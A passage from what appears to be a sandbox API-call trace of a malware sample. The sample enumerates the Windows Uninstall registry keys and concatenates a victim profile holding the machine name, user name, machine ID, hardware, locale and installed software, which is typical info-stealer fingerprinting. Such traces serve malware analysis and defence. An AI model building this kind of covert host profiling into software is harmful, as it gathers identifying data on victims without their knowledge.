Visual C++ 2012 Redistributable (x64) - 11.0.61030" [0208.115] RegQueryValueExA (in: hKey=0x3a4, lpValueName="DisplayVersion", lpReserved=0x0, lpType=0x19d62c, lpData=0x19ca18, lpcbData=0x19ce18*=0x400 | out: lpType=0x19d62c*=0x1, lpData="11.0.61030.0", lpcbData=0x19ce18*=0xd) returned 0x0 [0208.115] lstrcatA (in: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\977a8d56d7bbc22e780e85bea06fa4be13c8f9be01515665863cb431fb2e8daa.exe\n\nLocal Time: 13/9/2021 16:7:2\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable 8.0.61001\nOffice 16 Click-to-Run Extensibility Component 16.0.4266.1003\nOffice 16 Click-to-Run Localization Component 16.0.4266.1003\nMicrosoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 9.0.30729.6161\nMicrosoft Visual C++ 2012 x86 Additional Runtime - 11.0.61030 11.0.61030\nMicrosoft Visual C++ 2012 x86 Minimum Runtime - 11.0.61030 11.0.61030\nMicrosoft Visual C++ 2012 Redistributable (x64) - 11.0.61030", lpString2=" " | out: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\977a8d56d7bbc22e780e85bea06fa4be13c8f9be01515665863cb431fb2e8daa.exe\n\nLocal Time: 13/9/2021 16:7:2\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable 8.0.61001\nOffice 16 Click-to-Run Extensibility Component 16.0.4266.1003\nOffice 16 Click-to-Run Localization Component 16.0.4266.1003\nMicrosoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 9.0.30729.6161\nMicrosoft Visual C++ 2012 x86 Additional Runtime - 11.0.61030 11.0.61030\nMicrosoft Visual C++ 2012 x86 Minimum Runtime - 11.0.61030 11.0.61030\nMicrosoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 ") returned="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\977a8d56d7bbc22e780e85bea06fa4be13c8f9be01515665863cb431fb2e8daa.exe\n\nLocal Time: 13/9/2021 16:7:2\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable 8.0.61001\nOffice 16 Click-to-Run Extensibility Component 16.0.4266.1003\nOffice 16 Click-to-Run Localization Component 16.0.4266.1003\nMicrosoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 9.0.30729.6161\nMicrosoft Visual C++ 2012 x86 Additional Runtime - 11.0.61030 11.0.61030\nMicrosoft Visual C++ 2012 x86 Minimum Runtime - 11.0.61030 11.0.61030\nMicrosoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 " [0208.115] lstrcatA (in: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\977a8d56d7bbc22e780e85bea06fa4be13c8f9be01515665863cb431fb2e8daa.exe\n\nLocal Time: 13/9/2021 16:7:2\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable 8.0.61001\nOffice 16 Click-to-Run Extensibility Component 16.0.4266.1003\nOffice 16 Click-to-Run Localization Component 16.0.4266.1003\nMicrosoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 9.0.30729.6161\nMicrosoft Visual C++ 2012 x86 Additional Runtime - 11.0.61030 11.0.61030\nMicrosoft Visual C++ 2012 x86 Minimum Runtime - 11.0.61030 11.0.61030\nMicrosoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 ", lpString2="11.0.61030.0" | out: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\977a8d56d7bbc22e780e85bea06fa4be13c8f9be01515665863cb431fb2e8daa.exe\n\nLocal Time: 13/9/2021 16:7:2\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable 8.0.61001\nOffice 16 Click-to-Run Extensibility Component 16.0.4266.1003\nOffice 16 Click-to-Run Localization Component 16.0.4266.1003\nMicrosoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 9.0.30729.6161\nMicrosoft Visual C++ 2012 x86 Additional Runtime - 11.0.61030 11.0.61030\nMicrosoft Visual C++ 2012 x86 Minimum Runtime - 11.0.61030 11.0.61030\nMicrosoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 11.0.61030.0") returned="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\977a8d56d7bbc22e780e85bea06fa4be13c8f9be01515665863cb431fb2e8daa.exe\n\nLocal Time: 13/9/2021 16:7:2\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable 8.0.61001\nOffice 16 Click-to-Run Extensibility Component 16.0.4266.1003\nOffice 16 Click-to-Run Localization Component 16.0.4266.1003\nMicrosoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 9.0.30729.6161\nMicrosoft Visual C++ 2012 x86 Additional Runtime - 11.0.61030 11.0.61030\nMicrosoft Visual C++ 2012 x86 Minimum Runtime - 11.0.61030 11.0.61030\nMicrosoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 11.0.61030.0" [0208.115] lstrcatA (in: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\977a8d56d7bbc22e780e85bea06fa4be13c8f9be01515665863cb431fb2e8daa.exe\n\nLocal Time: 13/9/2021 16:7:2\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable 8.0.61001\nOffice 16 Click-to-Run Extensibility Component 16.0.4266.1003\nOffice 16 Click-to-Run Localization Component 16.0.4266.1003\nMicrosoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 9.0.30729.6161\nMicrosoft Visual C++ 2012 x86 Additional Runtime - 11.0.61030 11.0.61030\nMicrosoft Visual C++ 2012 x86 Minimum Runtime - 11.0.61030 11.0.61030\nMicrosoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 11.0.61030.0", lpString2="\n" | out: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\977a8d56d7bbc22e780e85bea06fa4be13c8f9be01515665863cb431fb2e8daa.exe\n\nLocal Time: 13/9/2021 16:7:2\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable 8.0.61001\nOffice 16 Click-to-Run Extensibility Component 16.0.4266.1003\nOffice 16 Click-to-Run Localization Component 16.0.4266.1003\nMicrosoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 9.0.30729.6161\nMicrosoft Visual C++ 2012 x86 Additional Runtime - 11.0.61030 11.0.61030\nMicrosoft Visual C++ 2012 x86 Minimum Runtime - 11.0.61030 11.0.61030\nMicrosoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 11.0.61030.0\n") returned="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\977a8d56d7bbc22e780e85bea06fa4be13c8f9be01515665863cb431fb2e8daa.exe\n\nLocal Time: 13/9/2021 16:7:2\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable 8.0.61001\nOffice 16 Click-to-Run Extensibility Component 16.0.4266.1003\nOffice 16 Click-to-Run Localization Component 16.0.4266.1003\nMicrosoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 9.0.30729.6161\nMicrosoft Visual C++ 2012 x86 Additional Runtime - 11.0.61030 11.0.61030\nMicrosoft Visual C++ 2012 x86 Minimum Runtime - 11.0.61030 11.0.61030\nMicrosoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 11.0.61030.0\n" [0208.115] RegCloseKey (hKey=0x3a4) returned 0x0 [0208.115] RegEnumKeyExA (in: hKey=0x3a8, dwIndex=0x22, lpName=0x19d228, lpcchName=0x19ce18, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{e6e75766-da0f-4ba2-9788-6ea593ce702d}", lpcchName=0x19ce18, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0208.115] wsprintfA (in: param_1=0x19ce28, param_2="%s\\%s" | out: param_1="SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Uninstall\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}") returned 94 [0208.115] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Uninstall\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}", ulOptions=0x0, samDesired=0x20019, phkResult=0x19ce24 | out: phkResult=0x19ce24*=0x3a4) returned 0x0 [0208.115] RegQueryValueExA (in: hKey=0x3a4, lpValueName="DisplayName", lpReserved=0x0, lpType=0x19d62c, lpData=0x19ca18, lpcbData=0x19ce18*=0x400 | out: lpType=0x19d62c*=0x1, lpData="Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.30501", lpcbData=0x19ce18*=0x3d) returned 0x0 [0208.115] lstrlenA (lpString="Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.30501") returned 60 [0208.115] lstrcatA (in: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\977a8d56d7bbc22e780e85bea06fa4be13c8f9be01515665863cb431fb2e8daa.exe\n\nLocal Time: 13/9/2021 16:7:2\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable 8.0.61001\nOffice 16 Click-to-Run Extensibility Component 16.0.4266.1003\nOffice 16 Click-to-Run Localization Component 16.0.4266.1003\nMicrosoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 9.0.30729.6161\nMicrosoft Visual C++ 2012 x86 Additional Runtime - 11.0.61030 11.0.61030\nMicrosoft Visual C++ 2012 x86 Minimum Runtime - 11.0.61030 11.0.61030\nMicrosoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 11.0.61030.0\n", lpString2="Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.30501" | out: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\977a8d56d7bbc22e780e85bea06fa4be13c8f9be01515665863cb431fb2e8daa.exe\n\nLocal Time: 13/9/2021 16:7:2\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable 8.0.61001\nOffice 16 Click-to-Run Extensibility Component 16.0.4266.1003\nOffice 16 Click-to-Run Localization Component 16.0.4266.1003\nMicrosoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 9.0.30729.6161\nMicrosoft Visual C++ 2012 x86 Additional Runtime - 11.0.61030 11.0.61030\nMicrosoft Visual C++ 2012 x86 Minimum Runtime - 11.0.61030 11.0.61030\nMicrosoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x86) - 12.0.30501") returned="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\977a8d56d7bbc22e780e85bea06fa4be13c8f9be01515665863cb431fb2e8daa.exe\n\nLocal Time: 13/9/2021 16:7:2\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable 8.0.61001\nOffice 16 Click-to-Run Extensibility Component 16.0.4266.1003\nOffice 16 Click-to-Run Localization Component 16.0.4266.1003\nMicrosoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 9.0.30729.6161\nMicrosoft Visual C++ 2012 x86 Additional Runtime - 11.0.61030 11.0.61030\nMicrosoft Visual C++ 2012 x86 Minimum Runtime - 11.0.61030 11.0.61030\nMicrosoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x86) - 12.0.30501" [0208.116] RegQueryValueExA (in: hKey=0x3a4, lpValueName="DisplayVersion", lpReserved=0x0, lpType=0x19d62c, lpData=0x19ca18, lpcbData=0x19ce18*=0x400 | out: lpType=0x19d62c*=0x1, lpData="12.0.30501.0", lpcbData=0x19ce18*=0xd) returned 0x0 [0208.116] lstrcatA (in: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\977a8d56d7bbc22e780e85bea06fa4be13c8f9be01515665863cb431fb2e8daa.exe\n\nLocal Time: 13/9/2021 16:7:2\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable 8.0.61001\nOffice 16 Click-to-Run Extensibility Component 16.0.4266.1003\nOffice 16 Click-to-Run Localization Component 16.0.4266.1003\nMicrosoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 9.0.30729.6161\nMicrosoft Visual C++ 2012 x86 Additional Runtime - 11.0.61030 11.0.61030\nMicrosoft Visual C++ 2012 x86 Minimum Runtime - 11.0.61030 11.0.61030\nMicrosoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x86) - 12.0.30501", lpString2=" " | out: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\977a8d56d7bbc22e780e85bea06fa4be13c8f9be01515665863cb431fb2e8daa.exe\n\nLocal Time: 13/9/2021 16:7:2\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual 